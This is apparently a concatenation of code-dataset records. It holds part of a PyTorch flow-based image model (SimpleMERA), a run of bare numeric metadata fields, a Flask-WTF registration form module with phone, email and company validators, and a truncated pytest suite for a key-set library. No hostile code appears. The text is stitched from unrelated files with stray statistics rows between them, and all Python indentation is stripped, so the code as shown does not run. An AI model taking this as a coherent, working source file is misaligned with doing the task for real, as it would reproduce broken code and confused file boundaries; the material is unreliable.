tmp = self.rounding(self.layerList[no * self.repeat * 2 + i](self.decimal.inverse_(upper)) * self.decimal.scaling)
down = down + tmp
else:
tmp = self.rounding(self.layerList[no * self.repeat * 2 + i](self.decimal.inverse_(down)) * self.decimal.scaling)
upper = upper - tmp
upper = upper.reshape(*upper.shape, 1)
down = down.reshape(*down.shape, 1)
ul = torch.cat([upper, down], -1).reshape(ul.shape[0] // ul.shape[-1], ul.shape[-1], ul.shape[1], ul.shape[-1]).permute([0, 2, 1, 3])
return ul, ul.new_zeros(ul.shape[0])
def logProbability(self, x, K=None):
z, logp = self.inverse(x)
if self.prior is not None:
if self.meanNNlist is not None and self.scaleNNlist is not None:
return self.prior.logProbability(z, K, self.meanList, self.scaleList) + logp
else:
return self.prior.logProbability(z, K) + logp
return logp
def im2grp(t):
return t.reshape(t.shape[0], t.shape[1], t.shape[2] // 2, 2, t.shape[3] // 2, 2).permute([0, 1, 2, 4, 3, 5]).reshape(t.shape[0], t.shape[1], -1, 4)
def grp2im(t):
return t.reshape(t.shape[0], t.shape[1], int(t.shape[2] ** 0.5), int(t.shape[2] ** 0.5), 2, 2).permute([0, 1, 2, 4, 3, 5]).reshape(t.shape[0], t.shape[1], int(t.shape[2] ** 0.5) * 2, int(t.shape[2] ** 0.5) * 2)
def form(tensor):
shape = int(tensor.shape[-2] ** 0.5)
return tensor.reshape(tensor.shape[0], tensor.shape[1], shape, shape, 2, 2).permute([0, 1, 2, 4, 3, 5]).reshape(tensor.shape[0], tensor.shape[1], shape * 2, shape * 2)
def reform(tensor):
return tensor.reshape(tensor.shape[0], tensor.shape[1] // 3, 3, tensor.shape[2], tensor.shape[3]).permute([0, 1, 3, 4, 2]).contiguous().reshape(tensor.shape[0], tensor.shape[1] // 3, tensor.shape[2] * tensor.shape[3], 3)
class SimpleMERA(Flow):
def __init__(self, length, layerList, meanNNlist=None, scaleNNlist=None, repeat=1, depth=None, nMixing=5, decimal=None, rounding=None, clamp=None, sameDetail=True, compatible=False, name="SimpleMERA"):
kernelSize = 2
if depth is None or depth == -1:
depth = int(math.log(length, kernelSize))
if meanNNlist is None or scaleNNlist is None:
prior = source.SimpleHierarchyPrior(length, nMixing, decimal, rounding, clamp=clamp, sameDetail=sameDetail, compatible=compatible)
else:
lastPrior = source.MixtureDiscreteLogistic([3, 1, 4], nMixing, decimal, rounding, clamp=clamp)
prior = source.PassiveHierarchyPrior(length, lastPrior, decimal=decimal, rounding=rounding, compatible=compatible)
super(SimpleMERA, self).__init__(prior, name)
self.decimal = decimal
self.rounding = rounding
self.repeat = repeat
self.depth = depth
self.compatible = compatible
if compatible:
assert len(layerList) == 4 * repeat * depth
assert len(meanNNlist) == depth
assert len(scaleNNlist) == depth
if len(layerList) != 4 * repeat * depth:
layerList = layerList * depth
assert len(layerList) == 4 * repeat * depth
self.layerList = torch.nn.ModuleList(layerList)
if meanNNlist is not None and scaleNNlist is not None:
if len(meanNNlist) != depth:
meanNNlist = meanNNlist * depth
scaleNNlist = scaleNNlist * depth
assert len(meanNNlist) == depth
assert len(scaleNNlist) == depth
self.meanNNlist = torch.nn.ModuleList(meanNNlist)
self.scaleNNlist = torch.nn.ModuleList(scaleNNlist)
else:
self.meanNNlist = None
self.scaleNNlist = None
def inverse(self, x):
if self.compatible:
depth = int(math.log(x.shape[-1], 2))
else:
depth = self.depth
self.meanList = []
self.scaleList = []
ul = x
UR = []
DL = []
DR = []
for no in range(depth):
_x = im2grp(ul)
ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
for i in range(4 * self.repeat):
if i % 4 == 0:
tmp = torch.cat([ur, dl, dr], 1)
tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
ul = ul + tmp
elif i % 4 == 1:
tmp = torch.cat([ul, dl, dr], 1)
tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
ur = ur + tmp
elif i % 4 == 2:
tmp = torch.cat([ul, ur, dr], 1)
tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
dl = dl + tmp
else:
tmp = torch.cat([ul, ur, dl], 1)
tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
dr = dr + tmp
if self.meanNNlist is not None and self.scaleNNlist is not None and no != depth - 1:
self.meanList.append(reform(self.meanNNlist[no](self.decimal.inverse_(ul))).contiguous())
self.scaleList.append(reform(self.scaleNNlist[no](self.decimal.inverse_(ul))).contiguous())
UR.append(ur)
DL.append(dl)
DR.append(dr)
for no in reversed(range(depth)):
ur = UR[no].reshape(*ul.shape, 1)
dl = DL[no].reshape(*ul.shape, 1)
dr = DR[no].reshape(*ul.shape, 1)
ul = ul.reshape(*ul.shape, 1)
_x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
ul = grp2im(_x).contiguous()
return ul, ul.new_zeros(ul.shape[0])
def forward(self, z):
if self.compatible:
depth = int(math.log(z.shape[-1], 2))
else:
depth = self.depth
ul = z
UR = []
DL = []
DR = []
for no in range(depth):
_x = im2grp(ul)
ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
UR.append(ur)
DL.append(dl)
DR.append(dr)
for no in reversed(range(depth)):
ur = UR[no]
dl = DL[no]
dr = DR[no]
for i in reversed(range(4 * self.repeat)):
if i % 4 == 0:
tmp = torch.cat([ur, dl, dr], 1)
tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
ul = ul - tmp
elif i % 4 == 1:
tmp = torch.cat([ul, dl, dr], 1)
tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
ur = ur - tmp
elif i % 4 == 2:
tmp = torch.cat([ul, ur, dr], 1)
tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
dl = dl - tmp
else:
tmp = torch.cat([ul, ur, dl], 1)
tmp = self.rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
dr = dr - tmp
ur = ur.reshape(*ul.shape, 1)
dl = dl.reshape(*ul.shape, 1)
dr = dr.reshape(*ul.shape, 1)
ul = ul.reshape(*ul.shape, 1)
_x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
ul = grp2im(_x).contiguous()
return ul, ul.new_zeros(ul.shape[0])
def inference(self, z, endDepth, startDepth=None, sample=False, logbase=-2, round=False):
if round:
rounding = self.rounding
else:
rounding = lambda x: x
assert self.layerList[0] is self.layerList[4 * self.repeat]
_depth = int(math.log(z.shape[-1], 2))
if startDepth is not None:
assert _depth == startDepth
else:
startDepth = _depth
assert endDepth > startDepth
ul = z
UR = []
DL = []
DR = []
for no in range(startDepth):
_x = im2grp(ul)
if no == startDepth - 1:
_length = _x.shape[-2]
ul = _x[:, :, :, 0].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
ur = _x[:, :, :, 1].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dl = _x[:, :, :, 2].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
dr = _x[:, :, :, 3].reshape(*_x.shape[:2], int(_x.shape[2] ** 0.5), int(_x.shape[2] ** 0.5)).contiguous()
UR.append(ur)
DL.append(dl)
DR.append(dr)
if self.meanNNlist is None:
_UR = []
_DL = []
_DR = []
_shapeList = []
for _ in range(startDepth, endDepth):
_length *= 4
_shapeList.append(_length)
assert self.prior.priorList[0] is self.prior.priorList[1]
for no in reversed(range(startDepth, endDepth)):
if sample:
details = utils.sampleDiscreteLogistic([z.shape[0], 3, _shapeList[no - startDepth], 3], self.prior.priorList[0].mean, self.prior.priorList[0].scale + logbase, decimal=self.decimal)
else:
details = rounding(self.decimal.forward_(self.prior.priorList[0].mean.reshape(1, 3, 1, 3).repeat(z.shape[0], 1, _shapeList[no - startDepth], 1)))
_UR.append(details[:, :, :, 0].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous())
_DL.append(details[:, :, :, 1].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous())
_DR.append(details[:, :, :, 2].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous())
startDepth = endDepth
UR = _UR + UR
DL = _DL + DL
DR = _DR + DR
for no in reversed(range(startDepth)):
ur = UR[no]
dl = DL[no]
dr = DR[no]
for i in reversed(range(4 * self.repeat)):
if i % 4 == 0:
tmp = torch.cat([ur, dl, dr], 1)
tmp = rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
ul = ul - tmp
elif i % 4 == 1:
tmp = torch.cat([ul, dl, dr], 1)
tmp = rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
ur = ur - tmp
elif i % 4 == 2:
tmp = torch.cat([ul, ur, dr], 1)
tmp = rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
dl = dl - tmp
else:
tmp = torch.cat([ul, ur, dl], 1)
tmp = rounding(self.layerList[no * 4 * self.repeat + i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
dr = dr - tmp
ur = ur.reshape(*ul.shape, 1)
dl = dl.reshape(*ul.shape, 1)
dr = dr.reshape(*ul.shape, 1)
ul = ul.reshape(*ul.shape, 1)
_x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
ul = grp2im(_x).contiguous()
if self.meanNNlist is not None:
assert self.meanNNlist[0] is self.meanNNlist[1]
assert self.scaleNNlist[0] is self.scaleNNlist[1]
for no in range(startDepth, endDepth):
mean = reform(self.meanNNlist[0](self.decimal.inverse_(ul))).contiguous()
if sample:
scale = reform(self.scaleNNlist[0](self.decimal.inverse_(ul))).contiguous()
details = utils.sampleDiscreteLogistic(mean.shape, mean, scale + logbase, decimal=self.decimal)
else:
details = rounding(self.decimal.forward_(mean))
ur = details[:, :, :, 0].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous()
dl = details[:, :, :, 1].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous()
dr = details[:, :, :, 2].reshape(*details.shape[:2], int(details.shape[2] ** 0.5), int(details.shape[2] ** 0.5)).contiguous()
for i in reversed(range(4 * self.repeat)):
if i % 4 == 0:
tmp = torch.cat([ur, dl, dr], 1)
tmp = rounding(self.layerList[i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
ul = ul - tmp
elif i % 4 == 1:
tmp = torch.cat([ul, dl, dr], 1)
tmp = rounding(self.layerList[i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
ur = ur - tmp
elif i % 4 == 2:
tmp = torch.cat([ul, ur, dr], 1)
tmp = rounding(self.layerList[i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
dl = dl - tmp
else:
tmp = torch.cat([ul, ur, dl], 1)
tmp = rounding(self.layerList[i](self.decimal.inverse_(tmp)) * self.decimal.scaling)
dr = dr - tmp
ur = ur.reshape(*ul.shape, 1)
dl = dl.reshape(*ul.shape, 1)
dr = dr.reshape(*ul.shape, 1)
ul = ul.reshape(*ul.shape, 1)
_x = torch.cat([ul, ur, dl, dr], -1).reshape(*ul.shape[:2], -1, 4)
ul = grp2im(_x).contiguous()
return ul
def logProbability(self, x, K=None):
z, logp = self.inverse(x)
if self.prior is not None:
if self.meanNNlist is not None and self.scaleNNlist is not None:
return self.prior.logProbability(z, K, self.meanList, self.scaleList) + logp
else:
return self.prior.logProbability(z, K) + logp
return logp
def sample(self, batch, sample=False, logbase=0):
if self.meanNNlist is not None:
z = self.prior.lastPrior.sample(batch)
else:
z = self.prior.priorList[-1].sample(batch)
z = grp2im(z)
return self.inference(z, self.depth, startDepth=1, sample=sample, logbase=logbase)
| 46.491379
| 224
| 0.511311
| 2,804
| 21,572
| 3.871612
| 0.038516
| 0.054164
| 0.039333
| 0.042004
| 0.85888
| 0.842299
| 0.811533
| 0.789425
| 0.778464
| 0.743552
| 0
| 0.036854
| 0.325793
| 21,572
| 463
| 225
| 46.591793
| 0.709571
| 0
| 0
| 0.75
| 0
| 0
| 0.00102
| 0
| 0
| 0
| 0
| 0
| 0.030928
| 1
| 0.036082
| false
| 0.005155
| 0.010309
| 0.007732
| 0.092784
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2965f8d2fffb2f571a99daf7b580ea510ab67bd
| 9,524
|
py
|
Python
|
forms.py
|
omar-sherif9992/OSA-WareHouse-API
|
ed9a6e8871bb3148f0dc30068bdccab7782862e8
|
[
"MIT"
] | 1
|
2022-02-15T01:37:16.000Z
|
2022-02-15T01:37:16.000Z
|
forms.py
|
omar-sherif9992/OSA-WareHouse-API
|
ed9a6e8871bb3148f0dc30068bdccab7782862e8
|
[
"MIT"
] | null | null | null |
forms.py
|
omar-sherif9992/OSA-WareHouse-API
|
ed9a6e8871bb3148f0dc30068bdccab7782862e8
|
[
"MIT"
] | null | null | null |
from flask_wtf import FlaskForm, RecaptchaField
from wtforms import StringField, SubmitField, SelectField, RadioField
from wtforms.validators import DataRequired, Length, Email, ValidationError
from my_data_validators import *
from select_fields_data import *
from models import User
from dotenv import load_dotenv
load_dotenv()
COMPANY_END=os.environ.get('COMPANY_END')
class GoogleForm(FlaskForm):
"""It's the form if the user selected google sign up"""
phone = StringField(label="", validators=[DataRequired()],
render_kw={"placeholder": "Phone Number ex: +209996752223"})
country = SelectField(label="", validators=[DataRequired()], choices=countries())
status = RadioField(label="", choices=[("User", "User"), ("Company", "Company")], render_kw={"Status"},
validators=[DataRequired()])
gender = SelectField(label="", choices=genders())
service = SelectField(label="", choices=all_services_list)
company_url = StringField(label="",
render_kw={"placeholder": "Company Page Link"})
birth_date = StringField(label="", render_kw={"placeholder": "Birth Date mm/dd/yyyy"})
recaptcha = RecaptchaField() # todo enable recaptcha after uploading to disable bots
submit = SubmitField(label="Register")
def validate_birth_date(self, birth_date):
"""it validates the user's birth date"""
flag, message = check_date(birth_date=birth_date.data)
if self.status.data == "User" and not flag:
raise ValidationError(message)
def validate_gender(self, gender):
"""it validates the user's gender"""
if self.status.data == "User" and gender.data == "Choose Your Gender":
raise ValidationError("Please Choose Your Gender")
def validate_service(self, service):
"""it validates the company's service"""
if self.status.data == "Company" and service.data == "Choose Your Company's Service":
raise ValidationError("Please Choose Your Company's Service")
def validate_company_url(self, company_url):
"""It checks if the company url is valid and the company's first name is in the url"""
if self.status.data == "Company":
try:
is_url(url=company_url.data)
except:
raise ValidationError("Invalid Company Url")
first_name = self.name.data
first_name = first_name.split(" ")[0]
if str(first_name).lower() not in str(company_url.data).lower():
raise ValidationError("This Company Url is not related to Your Company")
def validate_status(self, status):
"""it validates that the user selected status"""
if status.data != "User" and status.data != "Company":
raise ValidationError("Please Select Your Status")
def validate_country(self, country):
"""Make sure that the user have chosen a country"""
try:
country = country.data
if country == None or str(country) == "Country" or country == 'None' or country == "":
raise ValueError
except ValueError:
raise ValidationError('Choose Your Country')
def validate_phone(self, phone):
"""International Phone number Validator"""
user = User.query.filter_by(phone=phone.data).first()
if user != None:
raise ValidationError("Phone Number is used before")
try:
if len(str(phone.data)) >= 5 and self.status.data == "Company":
return
p = phonenumbers.parse(phone.data)
if not phonenumbers.is_valid_number(p):
# Because Company's phone consist of 5 numbers like jumia
raise ValueError()
except (phonenumbers.phonenumberutil.NumberParseException, ValueError):
raise ValidationError('Invalid Phone Number')
class ForgotForm(FlaskForm):
"""It's the form if the user selected google sign up"""
email = StringField(label="", validators=[Email("This field requires a valid Email Address"), DataRequired(),
Length(min=6, max=35)], render_kw={"placeholder": "Email"})
phone = StringField(label="", validators=[DataRequired()],
render_kw={"placeholder": "Phone Number ex: +209996752223"})
recaptcha = RecaptchaField() # todo enable recaptcha after uploading to disable bots
submit = SubmitField(label="Find api_key")
def validate_email(self, email):
"""Email Validator for forgot form"""
check_email(email.data)
# no phone validator here cause status radio is not available
class RegisterForm(FlaskForm):
"""User Register his or her Data"""
name = StringField(label="", validators=[DataRequired()], render_kw={"placeholder": "Name"})
email = StringField(label="", validators=[Email("This field requires a valid Email Address"), DataRequired(),
Length(min=6, max=35)], render_kw={"placeholder": "Email"})
phone = StringField(label="", validators=[DataRequired()],
render_kw={"placeholder": "Phone Number ex: +209996752223"})
country = SelectField(label="", validators=[DataRequired()], choices=countries())
status = RadioField(label="", choices=[("User", "User"), ("Company", "Company")], render_kw={"Status"},
validators=[DataRequired()])
gender = SelectField(label="", choices=genders())
service = SelectField(label="", choices=all_services_list)
company_url = StringField(label="", render_kw={"placeholder": "Company Page Link"})
birth_date = StringField(label="", render_kw={"placeholder": "Birth Date mm/dd/yyyy"})
recaptcha = RecaptchaField() # todo enable recaptcha after uploading to disable bots
submit = SubmitField(label="Register")
def validate_birth_date(self, birth_date):
"""it validates the user's birth date"""
flag, message = check_date(birth_date=birth_date.data)
if self.status.data == "User" and not flag:
raise ValidationError(message)
def validate_gender(self, gender):
"""it validates the user's gender"""
if self.status.data == "User" and gender.data == "Choose Your Gender":
raise ValidationError("Please Choose Your Gender")
def validate_service(self, service):
"""it validates the company's service"""
if self.status.data == "Company" and service.data == "Choose Your Company's Service":
raise ValidationError("Please Choose Your Company's Service")
def validate_company_url(self, company_url):
"""It checks if the company url is valid and the company's first name is in the url"""
if self.status.data == "Company":
try:
is_url(url=company_url.data)
except:
raise ValidationError("Invalid Company Url")
first_name = self.name.data
first_name = first_name.split(" ")[0]
if str(first_name).lower() not in str(company_url.data).lower():
raise ValidationError("This Company Url is not related to Your Company")
def validate_status(self, status):
"""it validates that the user selected status"""
if status.data != "User" and status.data != "Company":
raise ValidationError("Please Select Your Status")
def validate_email(self, email):
"""Email Validator"""
user = User.query.filter_by(email=email.data).first()
if user != None:
raise ValidationError("Email Address is used before")
check_email(email.data)
def validate_name(self, name):
"""Name Validator"""
word = str(name.data).strip()
if self.status.data == "User":
for letter in word:
if letter.isdigit():
raise ValidationError('Please write your Real Name without Digits!')
elif not letter.isascii():
raise ValidationError('Please write your Real Name only letters!')
if self.status.data == "Company":
if not is_company(company_name=str(name.data)):
raise ValidationError('Please Enter Your company name in the correct format and ending')
if COMPANY_END not in name.data.lower():
raise ValidationError("ask permission from osa.helpme@gmail.com")
def validate_country(self, country):
"""Make sure that the user have chosen a country"""
try:
country = country.data
if country == None or country == 'None' or str(country) == "Country":
raise ValueError
except ValueError:
raise ValidationError('Please Choose Your Country')
def validate_phone(self, phone):
"""International Phone number Validator"""
user = User.query.filter_by(phone=phone.data).first()
if user != None:
raise ValidationError("Phone Number is used before")
try:
if len(str(phone.data)) >= 5 and self.status.data == "Company":
return
p = phonenumbers.parse(phone.data)
if (not phonenumbers.is_valid_number(p)) and self.status.data == "User":
raise ValueError()
except (phonenumbers.phonenumberutil.NumberParseException, ValueError):
raise ValidationError('Invalid Phone Number')
| 46.686275
| 113
| 0.630302
| 1,087
| 9,524
| 5.442502
| 0.162833
| 0.077755
| 0.030764
| 0.027045
| 0.840433
| 0.83215
| 0.821839
| 0.760142
| 0.760142
| 0.760142
| 0
| 0.006635
| 0.256195
| 9,524
| 203
| 114
| 46.916256
| 0.828487
| 0.114343
| 0
| 0.75
| 0
| 0
| 0.160644
| 0
| 0
| 0
| 0
| 0.004926
| 0
| 1
| 0.114865
| false
| 0
| 0.047297
| 0
| 0.358108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a22f8f19d085ee5658712f98c0dc414be10ca01e
| 42
|
py
|
Python
|
lineman/lineman/__init__.py
|
tomstasz/micro
|
0f56e38de5b75ed57f0e0584ba40c0e0f1b5f9c3
|
[
"MIT"
] | null | null | null |
lineman/lineman/__init__.py
|
tomstasz/micro
|
0f56e38de5b75ed57f0e0584ba40c0e0f1b5f9c3
|
[
"MIT"
] | null | null | null |
lineman/lineman/__init__.py
|
tomstasz/micro
|
0f56e38de5b75ed57f0e0584ba40c0e0f1b5f9c3
|
[
"MIT"
] | null | null | null |
import lineman.app
import lineman.models
| 10.5
| 21
| 0.833333
| 6
| 42
| 5.833333
| 0.666667
| 0.742857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 42
| 3
| 22
| 14
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a26b3eb6286bb72af90e9cbf70bfdc24fc379bcf
| 11,243
|
py
|
Python
|
tests/test_all_except_some.py
|
eturino/key_set.py
|
ee9a8e27012789ae46657eef7ac057412c33a313
|
[
"Apache-2.0"
] | null | null | null |
tests/test_all_except_some.py
|
eturino/key_set.py
|
ee9a8e27012789ae46657eef7ac057412c33a313
|
[
"Apache-2.0"
] | null | null | null |
tests/test_all_except_some.py
|
eturino/key_set.py
|
ee9a8e27012789ae46657eef7ac057412c33a313
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import __future__ # noqa: F401
from key_set.base import KeySetAll, KeySetAllExceptSome, KeySetNone, KeySetSome
class TestAllExceptSome: # noqa: D101
def test_represents(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
assert ks.represents_all_except_some()
assert not ks.represents_none()
assert not ks.represents_all()
assert not ks.represents_some()
def test_invert(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
actual = ks.invert()
assert actual.represents_some()
assert actual.elements() == {'a', 'b'}
def test_clone(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
actual = ks.clone()
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
assert actual == ks
assert actual is not ks
def test_repr(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
actual = eval(repr(ks))
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
assert actual == ks
assert actual is not ks
def test_len(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
assert len(ks) == 2
def test_elements(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
assert ks.elements() == {'a', 'b'}
def test_intersect_all(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAll()
actual = ks.intersect(other)
assert actual.represents_all_except_some()
assert actual == ks
assert actual is not ks
def test_intersect_none(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetNone()
actual = ks.intersect(other)
assert actual.represents_none()
assert actual == other
assert actual is not other
def test_intersect_some_same_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a', 'b'})
actual = ks.intersect(other)
assert actual.represents_none()
def test_intersect_some_subset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a'})
actual = ks.intersect(other)
assert actual.represents_none()
def test_intersect_some_superset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a', 'b', 'c'})
actual = ks.intersect(other)
assert actual.represents_some()
assert actual.elements() == {'c'}
def test_intersect_some_with_some_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a', 'c'})
actual = ks.intersect(other)
assert actual.represents_some()
assert actual.elements() == {'c'}
def test_intersect_some_without_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'c', 'd'})
actual = ks.intersect(other)
assert actual.represents_some()
assert actual.elements() == {'c', 'd'}
def test_intersect_all_except_some_same_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a', 'b'})
actual = ks.intersect(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
def test_intersect_all_except_some_subset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a'})
actual = ks.intersect(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
def test_intersect_all_except_some_superset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a', 'b', 'c'})
actual = ks.intersect(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b', 'c'}
def test_intersect_all_except_some_with_some_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a', 'c'})
actual = ks.intersect(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b', 'c'}
def test_intersect_all_except_some_without_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'c', 'd'})
actual = ks.intersect(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b', 'c', 'd'}
def test_includes_included(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
assert not ks.includes('a')
assert 'a' not in ks
def test_includes_missing(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
assert ks.includes('c')
assert 'c' in ks
def test_union_all(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAll()
actual = ks.union(other)
assert actual.represents_all()
assert actual == other
assert actual is not other
def test_union_none(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetNone()
actual = ks.union(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
def test_union_some_same_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a', 'b'})
actual = ks.union(other)
assert actual.represents_all()
def test_union_some_subset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a'})
actual = ks.union(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'b'}
def test_union_some_superset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a', 'b', 'c'})
actual = ks.union(other)
assert actual.represents_all()
def test_union_some_with_some_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'a', 'c'})
actual = ks.union(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'b'}
def test_union_some_without_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetSome({'c', 'd'})
actual = ks.union(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
def test_union_all_except_some_same_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a', 'b'})
actual = ks.union(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
def test_union_all_except_some_subset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a'})
actual = ks.union(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a'}
def test_union_all_except_some_superset_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a', 'b', 'c'})
actual = ks.union(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a', 'b'}
def test_union_all_except_some_with_some_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'a', 'c'})
actual = ks.union(other)
assert actual.represents_all_except_some()
assert actual.elements() == {'a'}
def test_union_all_except_some_without_common_keys(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAllExceptSome({'c', 'd'})
actual = ks.union(other)
assert actual.represents_all()
def test_remove_all(self) -> None:
ks = KeySetAllExceptSome({'a', 'b'})
other = KeySetAll()
actual = ks.difference(other)
